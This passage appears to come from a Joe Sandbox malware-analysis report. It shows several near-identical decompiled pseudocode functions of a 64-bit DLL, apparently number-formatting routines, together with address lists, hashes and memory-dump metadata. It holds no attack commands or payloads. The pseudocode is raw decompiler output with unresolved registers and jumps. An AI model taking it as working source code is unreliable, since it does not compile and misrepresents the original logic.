                                                                      				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}























                                                                      0x18001c6fc
                                                                      0x18001c6fc
                                                                      0x18001c701
                                                                      0x18001c706
                                                                      0x18001c717
                                                                      0x18001c71a
                                                                      0x18001c71d
                                                                      0x18001c720
                                                                      0x18001c726
                                                                      0x18001c729
                                                                      0x18001c72f
                                                                      0x18001c731
                                                                      0x18001c733
                                                                      0x18001c73c
                                                                      0x18001c741
                                                                      0x18001c746
                                                                      0x18001c74f
                                                                      0x18001c75c
                                                                      0x18001c76c
                                                                      0x18001c772
                                                                      0x18001c777
                                                                      0x18001c783
                                                                      0x18001c795
                                                                      0x18001c797
                                                                      0x18001c79c
                                                                      0x18001c7a1
                                                                      0x18001c7a6
                                                                      0x18001c7b2
                                                                      0x18001c7c2
                                                                      0x18001c7c5
                                                                      0x18001c7c7
                                                                      0x18001c7cc
                                                                      0x18001c7d1
                                                                      0x18001c7d6
                                                                      0x18001c7de
                                                                      0x18001c7e7
                                                                      0x18001c7f0
                                                                      0x18001c7f6
                                                                      0x18001c7fb
                                                                      0x18001c7ff
                                                                      0x18001c802
                                                                      0x18001c809
                                                                      0x18001c80d
                                                                      0x18001c818
                                                                      0x18001c81d
                                                                      0x18001c823
                                                                      0x18001c82a
                                                                      0x18001c836
                                                                      0x18001c848
                                                                      0x18001c84a
                                                                      0x18001c84f
                                                                      0x18001c851
                                                                      0x18001c856
                                                                      0x18001c858
                                                                      0x18001c85f
                                                                      0x18001c868
                                                                      0x18001c871
                                                                      0x18001c87c
                                                                      0x18001c885
                                                                      0x18001c88a
                                                                      0x18001c88c
                                                                      0x18001c88f
                                                                      0x18001c892
                                                                      0x18001c899
                                                                      0x18001c89b
                                                                      0x18001c8a2
                                                                      0x18001c8af
                                                                      0x18001c8b6
                                                                      0x18001c8be
                                                                      0x18001c8c0
                                                                      0x18001c8c4
                                                                      0x18001c8c8
                                                                      0x18001c8d1
                                                                      0x18001c8d6
                                                                      0x18001c8db
                                                                      0x18001c8df
                                                                      0x18001c8ec
                                                                      0x18001c8f7
                                                                      0x18001c900
                                                                      0x18001c902
                                                                      0x18001c90b
                                                                      0x18001c90e
                                                                      0x18001c92b

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2fb2cda9dfa77c8f5633a862135b1e4d6fb0f2ebd8c77b2093bb9a4212e675b7
                                                                      • Instruction ID: 574c8985a19b3ee6fafb34c12e274d004fad3071c66fe242f6b821fdf25c1f92
                                                                      • Opcode Fuzzy Hash: 2fb2cda9dfa77c8f5633a862135b1e4d6fb0f2ebd8c77b2093bb9a4212e675b7
                                                                      • Instruction Fuzzy Hash: 5F51B772504E4886FBA78F28C054BEC2760E74DBECF148215FA490B6C9CF75CA4AC74A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001F104(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t92;
                                                                      				signed int _t101;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t115;
                                                                      				intOrPtr _t129;
                                                                      				void* _t132;
                                                                      				signed long long _t153;
                                                                      				signed long long _t154;
                                                                      				void* _t157;
                                                                      				void* _t160;
                                                                      				void* _t163;
                                                                      
                                                                      				_t160 = __r8;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t132 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t92 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t110 = _t92 - 5;
                                                                      				if (_t110 > 0) goto 0x8001f1e3;
                                                                      				if (_t110 == 0) goto 0x8001f15d;
                                                                      				_t111 = _t92;
                                                                      				if (_t111 == 0) goto 0x8001f237;
                                                                      				if (_t111 == 0) goto 0x8001f1b3;
                                                                      				if (_t111 == 0) goto 0x8001f184;
                                                                      				if (_t111 == 0) goto 0x8001f237;
                                                                      				if (_t92 - 0xffffffffffffffff != 1) goto 0x8001f203;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001f260;
                                                                      				E000000011800199C8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001f265;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001f1a9;
                                                                      				_t70 = E00000001180017368( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001f265;
                                                                      				E00000001180017A10(_t70, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001f265;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t115 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t115 == 0) goto 0x8001f1d9;
                                                                      				_t74 = E00000001180016A80( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001f265;
                                                                      				E00000001180016EF8(_t74, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001f265;
                                                                      				if (_t115 == 0) goto 0x8001f15d;
                                                                      				if (_t115 == 0) goto 0x8001f15d;
                                                                      				if (_t115 == 0) goto 0x8001f15d;
                                                                      				goto 0x8001f14b;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t157, _t160);
                                                                      				goto 0x8001f31b;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001f259;
                                                                      				_t80 = E00000001180017E80( *(_t132 + 0x28) >> 4, _t132, _t132,  &_a8);
                                                                      				goto 0x8001f265;
                                                                      				_t81 = E000000011800182E8(_t80, _t132, _t132,  &_a8, _t160);
                                                                      				goto 0x8001f265;
                                                                      				E00000001180019E38(_t81, _t132, _t132,  &_a8);
                                                                      				if (0 == 0) goto 0x8001f230;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x470)) != 1) goto 0x8001f27f;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x474)) != 1) goto 0x8001f319;
                                                                      				_t153 = _a8;
                                                                      				if (0 == 0) goto 0x8001f29d;
                                                                      				if (_t153 >= 0) goto 0x8001f29d;
                                                                      				_t154 =  ~_t153;
                                                                      				_t101 =  *(_t132 + 0x28) | 0x00000040;
                                                                      				 *(_t132 + 0x28) = _t101;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x30)) >= 0) goto 0x8001f2ac;
                                                                      				 *((intOrPtr*)(_t132 + 0x30)) = 1;
                                                                      				goto 0x8001f2c3;
                                                                      				 *(_t132 + 0x28) = _t101 & 0xfffffff7;
                                                                      				E000000011800167C4(_t132, _t132 + 0x50,  *((intOrPtr*)(_t132 + 0x30)), _t154,  *((intOrPtr*)(_t132 + 8)));
                                                                      				if (_t154 != 0) goto 0x8001f2cc;
                                                                      				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t132 + 0x4c)) = 1;
                                                                      				r8b = r14b;
                                                                      				if (_t163 != _t163) goto 0x8001f2e5;
                                                                      				E0000000118002232C(0, _t132, _t154);
                                                                      				goto 0x8001f2ec;
                                                                      				E00000001180020D6C(__esi, _t132);
                                                                      				if (0 == 0) goto 0x8001f319;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001f30a;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001f319;
                                                                      				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001f104
                                                                      0x18001f104
                                                                      0x18001f109
                                                                      0x18001f10e
                                                                      0x18001f11f
                                                                      0x18001f122
                                                                      0x18001f125
                                                                      0x18001f128
                                                                      0x18001f12e
                                                                      0x18001f131
                                                                      0x18001f137
                                                                      0x18001f139
                                                                      0x18001f13b
                                                                      0x18001f144
                                                                      0x18001f149
                                                                      0x18001f14e
                                                                      0x18001f157
                                                                      0x18001f164
                                                                      0x18001f174
                                                                      0x18001f17a
                                                                      0x18001f17f
                                                                      0x18001f18b
                                                                      0x18001f19d
                                                                      0x18001f19f
                                                                      0x18001f1a4
                                                                      0x18001f1a9
                                                                      0x18001f1ae
                                                                      0x18001f1ba
                                                                      0x18001f1ca
                                                                      0x18001f1cd
                                                                      0x18001f1cf
                                                                      0x18001f1d4
                                                                      0x18001f1d9
                                                                      0x18001f1de
                                                                      0x18001f1e6
                                                                      0x18001f1ef
                                                                      0x18001f1f8
                                                                      0x18001f1fe
                                                                      0x18001f203
                                                                      0x18001f207
                                                                      0x18001f20a
                                                                      0x18001f211
                                                                      0x18001f215
                                                                      0x18001f220
                                                                      0x18001f225
                                                                      0x18001f22b
                                                                      0x18001f232
                                                                      0x18001f23e
                                                                      0x18001f250
                                                                      0x18001f252
                                                                      0x18001f257
                                                                      0x18001f259
                                                                      0x18001f25e
                                                                      0x18001f260
                                                                      0x18001f267
                                                                      0x18001f270
                                                                      0x18001f279
                                                                      0x18001f284
                                                                      0x18001f28d
                                                                      0x18001f292
                                                                      0x18001f294
                                                                      0x18001f297
                                                                      0x18001f29a
                                                                      0x18001f2a1
                                                                      0x18001f2a3
                                                                      0x18001f2aa
                                                                      0x18001f2b7
                                                                      0x18001f2be
                                                                      0x18001f2c6
                                                                      0x18001f2c8
                                                                      0x18001f2cc
                                                                      0x18001f2d0
                                                                      0x18001f2d9
                                                                      0x18001f2de
                                                                      0x18001f2e3
                                                                      0x18001f2e7
                                                                      0x18001f2f4
                                                                      0x18001f2ff
                                                                      0x18001f308
                                                                      0x18001f30a
                                                                      0x18001f313
                                                                      0x18001f316
                                                                      0x18001f333

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 537412fdb35c66556ec448a426ec85e8787e100ea82ee138dc8340c927b46ac2
                                                                      • Instruction ID: 4a907f3b4ce2c082259746ba0b0b1e0c32b9099279bd48910b0a96611d205046
                                                                      • Opcode Fuzzy Hash: 537412fdb35c66556ec448a426ec85e8787e100ea82ee138dc8340c927b46ac2
                                                                      • Instruction Fuzzy Hash: F7517C76114E4882EBB78E28C0553F827A0E74DBECF158215FA4A4B7D9CF35CA4AC701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001F70C(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t92;
                                                                      				signed int _t101;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t115;
                                                                      				intOrPtr _t129;
                                                                      				void* _t132;
                                                                      				signed long long _t153;
                                                                      				signed long long _t154;
                                                                      				void* _t157;
                                                                      				void* _t160;
                                                                      				void* _t163;
                                                                      
                                                                      				_t160 = __r8;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t132 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t92 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t110 = _t92 - 5;
                                                                      				if (_t110 > 0) goto 0x8001f7eb;
                                                                      				if (_t110 == 0) goto 0x8001f765;
                                                                      				_t111 = _t92;
                                                                      				if (_t111 == 0) goto 0x8001f83f;
                                                                      				if (_t111 == 0) goto 0x8001f7bb;
                                                                      				if (_t111 == 0) goto 0x8001f78c;
                                                                      				if (_t111 == 0) goto 0x8001f83f;
                                                                      				if (_t92 - 0xffffffffffffffff != 1) goto 0x8001f80b;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001f868;
                                                                      				E00000001180019AD0( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001f86d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001f7b1;
                                                                      				_t70 = E00000001180017474( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001f86d;
                                                                      				E00000001180017B18(_t70, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001f86d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t115 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t115 == 0) goto 0x8001f7e1;
                                                                      				_t74 = E00000001180016B8C( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001f86d;
                                                                      				E00000001180017000(_t74, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001f86d;
                                                                      				if (_t115 == 0) goto 0x8001f765;
                                                                      				if (_t115 == 0) goto 0x8001f765;
                                                                      				if (_t115 == 0) goto 0x8001f765;
                                                                      				goto 0x8001f753;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t157, _t160);
                                                                      				goto 0x8001f923;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001f861;
                                                                      				_t80 = E00000001180017F88( *(_t132 + 0x28) >> 4, _t132, _t132,  &_a8);
                                                                      				goto 0x8001f86d;
                                                                      				_t81 = E000000011800183F0(_t80, _t132, _t132,  &_a8, _t160);
                                                                      				goto 0x8001f86d;
                                                                      				E00000001180019F40(_t81, _t132, _t132,  &_a8);
                                                                      				if (0 == 0) goto 0x8001f838;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x470)) != 1) goto 0x8001f887;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x474)) != 1) goto 0x8001f921;
                                                                      				_t153 = _a8;
                                                                      				if (0 == 0) goto 0x8001f8a5;
                                                                      				if (_t153 >= 0) goto 0x8001f8a5;
                                                                      				_t154 =  ~_t153;
                                                                      				_t101 =  *(_t132 + 0x28) | 0x00000040;
                                                                      				 *(_t132 + 0x28) = _t101;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x30)) >= 0) goto 0x8001f8b4;
                                                                      				 *((intOrPtr*)(_t132 + 0x30)) = 1;
                                                                      				goto 0x8001f8cb;
                                                                      				 *(_t132 + 0x28) = _t101 & 0xfffffff7;
                                                                      				E000000011800167C4(_t132, _t132 + 0x50,  *((intOrPtr*)(_t132 + 0x30)), _t154,  *((intOrPtr*)(_t132 + 8)));
                                                                      				if (_t154 != 0) goto 0x8001f8d4;
                                                                      				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t132 + 0x4c)) = 1;
                                                                      				r8b = r14b;
                                                                      				if (_t163 != _t163) goto 0x8001f8ed;
                                                                      				E00000001180022518(0, _t132, _t154);
                                                                      				goto 0x8001f8f4;
                                                                      				E00000001180020F58(__esi, _t132);
                                                                      				if (0 == 0) goto 0x8001f921;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001f912;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001f921;
                                                                      				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001f70c
                                                                      0x18001f70c
                                                                      0x18001f711
                                                                      0x18001f716
                                                                      0x18001f727
                                                                      0x18001f72a
                                                                      0x18001f72d
                                                                      0x18001f730
                                                                      0x18001f736
                                                                      0x18001f739
                                                                      0x18001f73f
                                                                      0x18001f741
                                                                      0x18001f743
                                                                      0x18001f74c
                                                                      0x18001f751
                                                                      0x18001f756
                                                                      0x18001f75f
                                                                      0x18001f76c
                                                                      0x18001f77c
                                                                      0x18001f782
                                                                      0x18001f787
                                                                      0x18001f793
                                                                      0x18001f7a5
                                                                      0x18001f7a7
                                                                      0x18001f7ac
                                                                      0x18001f7b1
                                                                      0x18001f7b6
                                                                      0x18001f7c2
                                                                      0x18001f7d2
                                                                      0x18001f7d5
                                                                      0x18001f7d7
                                                                      0x18001f7dc
                                                                      0x18001f7e1
                                                                      0x18001f7e6
                                                                      0x18001f7ee
                                                                      0x18001f7f7
                                                                      0x18001f800
                                                                      0x18001f806
                                                                      0x18001f80b
                                                                      0x18001f80f
                                                                      0x18001f812
                                                                      0x18001f819
                                                                      0x18001f81d
                                                                      0x18001f828
                                                                      0x18001f82d
                                                                      0x18001f833
                                                                      0x18001f83a
                                                                      0x18001f846
                                                                      0x18001f858
                                                                      0x18001f85a
                                                                      0x18001f85f
                                                                      0x18001f861
                                                                      0x18001f866
                                                                      0x18001f868
                                                                      0x18001f86f
                                                                      0x18001f878
                                                                      0x18001f881
                                                                      0x18001f88c
                                                                      0x18001f895
                                                                      0x18001f89a
                                                                      0x18001f89c
                                                                      0x18001f89f
                                                                      0x18001f8a2
                                                                      0x18001f8a9
                                                                      0x18001f8ab
                                                                      0x18001f8b2
                                                                      0x18001f8bf
                                                                      0x18001f8c6
                                                                      0x18001f8ce
                                                                      0x18001f8d0
                                                                      0x18001f8d4
                                                                      0x18001f8d8
                                                                      0x18001f8e1
                                                                      0x18001f8e6
                                                                      0x18001f8eb
                                                                      0x18001f8ef
                                                                      0x18001f8fc
                                                                      0x18001f907
                                                                      0x18001f910
                                                                      0x18001f912
                                                                      0x18001f91b
                                                                      0x18001f91e
                                                                      0x18001f93b

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7588e1ff2024209ca3b2d71555f5c018608f4cb43b3ab9877f9ffc435bac2466
                                                                      • Instruction ID: be1a6d5b5d9b8ebdb437251a980d7aa44ea8358b914e0c5f97ade70a193fc072
                                                                      • Opcode Fuzzy Hash: 7588e1ff2024209ca3b2d71555f5c018608f4cb43b3ab9877f9ffc435bac2466
                                                                      • Instruction Fuzzy Hash: 41516E72514E4882F7B69E2980643F827A0E74CBECF158215FA494B7DACF35CA4AC741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001D8FC(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t92;
                                                                      				signed int _t101;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t115;
                                                                      				intOrPtr _t129;
                                                                      				void* _t132;
                                                                      				signed long long _t153;
                                                                      				signed long long _t154;
                                                                      				void* _t157;
                                                                      				void* _t160;
                                                                      				void* _t162;
                                                                      				void* _t163;
                                                                      
                                                                      				_t162 = __r10;
                                                                      				_t160 = __r8;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t132 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t92 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t110 = _t92 - 5;
                                                                      				if (_t110 > 0) goto 0x8001d9db;
                                                                      				if (_t110 == 0) goto 0x8001d955;
                                                                      				_t111 = _t92;
                                                                      				if (_t111 == 0) goto 0x8001da2f;
                                                                      				if (_t111 == 0) goto 0x8001d9ab;
                                                                      				if (_t111 == 0) goto 0x8001d97c;
                                                                      				if (_t111 == 0) goto 0x8001da2f;
                                                                      				if (_t92 - 0xffffffffffffffff != 1) goto 0x8001d9fb;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001da58;
                                                                      				E000000011800199C8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001da5d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d9a1;
                                                                      				_t70 = E00000001180017368( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001da5d;
                                                                      				E00000001180017A10(_t70, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001da5d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t115 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t115 == 0) goto 0x8001d9d1;
                                                                      				_t74 = E00000001180016A80( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001da5d;
                                                                      				E00000001180016EF8(_t74, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001da5d;
                                                                      				if (_t115 == 0) goto 0x8001d955;
                                                                      				if (_t115 == 0) goto 0x8001d955;
                                                                      				if (_t115 == 0) goto 0x8001d955;
                                                                      				goto 0x8001d943;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t157, _t160);
                                                                      				goto 0x8001db13;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001da51;
                                                                      				_t80 = E00000001180017E80( *(_t132 + 0x28) >> 4, _t132, _t132,  &_a8);
                                                                      				goto 0x8001da5d;
                                                                      				_t81 = E000000011800182E8(_t80, _t132, _t132,  &_a8, _t160);
                                                                      				goto 0x8001da5d;
                                                                      				E00000001180019E38(_t81, _t132, _t132,  &_a8);
                                                                      				if (0 == 0) goto 0x8001da28;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x470)) != 1) goto 0x8001da77;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x474)) != 1) goto 0x8001db11;
                                                                      				_t153 = _a8;
                                                                      				if (0 == 0) goto 0x8001da95;
                                                                      				if (_t153 >= 0) goto 0x8001da95;
                                                                      				_t154 =  ~_t153;
                                                                      				_t101 =  *(_t132 + 0x28) | 0x00000040;
                                                                      				 *(_t132 + 0x28) = _t101;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x30)) >= 0) goto 0x8001daa4;
                                                                      				 *((intOrPtr*)(_t132 + 0x30)) = 1;
                                                                      				goto 0x8001dabb;
                                                                      				 *(_t132 + 0x28) = _t101 & 0xfffffff7;
                                                                      				E000000011800167C4(_t132, _t132 + 0x50,  *((intOrPtr*)(_t132 + 0x30)), _t154,  *((intOrPtr*)(_t132 + 8)));
                                                                      				if (_t154 != 0) goto 0x8001dac4;
                                                                      				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t132 + 0x4c)) = 1;
                                                                      				r8b = r14b;
                                                                      				if (_t163 != _t163) goto 0x8001dadd;
                                                                      				E00000001180021B80(_t132, _t154);
                                                                      				goto 0x8001dae4;
                                                                      				E000000011800205E8(__esi, _t132, _t154, _t162);
                                                                      				if (0 == 0) goto 0x8001db11;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001db02;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001db11;
                                                                      				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}























                                                                      0x18001d8fc
                                                                      0x18001d8fc
                                                                      0x18001d8fc
                                                                      0x18001d901
                                                                      0x18001d906
                                                                      0x18001d917
                                                                      0x18001d91a
                                                                      0x18001d91d
                                                                      0x18001d920
                                                                      0x18001d926
                                                                      0x18001d929
                                                                      0x18001d92f
                                                                      0x18001d931
                                                                      0x18001d933
                                                                      0x18001d93c
                                                                      0x18001d941
                                                                      0x18001d946
                                                                      0x18001d94f
                                                                      0x18001d95c
                                                                      0x18001d96c
                                                                      0x18001d972
                                                                      0x18001d977
                                                                      0x18001d983
                                                                      0x18001d995
                                                                      0x18001d997
                                                                      0x18001d99c
                                                                      0x18001d9a1
                                                                      0x18001d9a6
                                                                      0x18001d9b2
                                                                      0x18001d9c2
                                                                      0x18001d9c5
                                                                      0x18001d9c7
                                                                      0x18001d9cc
                                                                      0x18001d9d1
                                                                      0x18001d9d6
                                                                      0x18001d9de
                                                                      0x18001d9e7
                                                                      0x18001d9f0
                                                                      0x18001d9f6
                                                                      0x18001d9fb
                                                                      0x18001d9ff
                                                                      0x18001da02
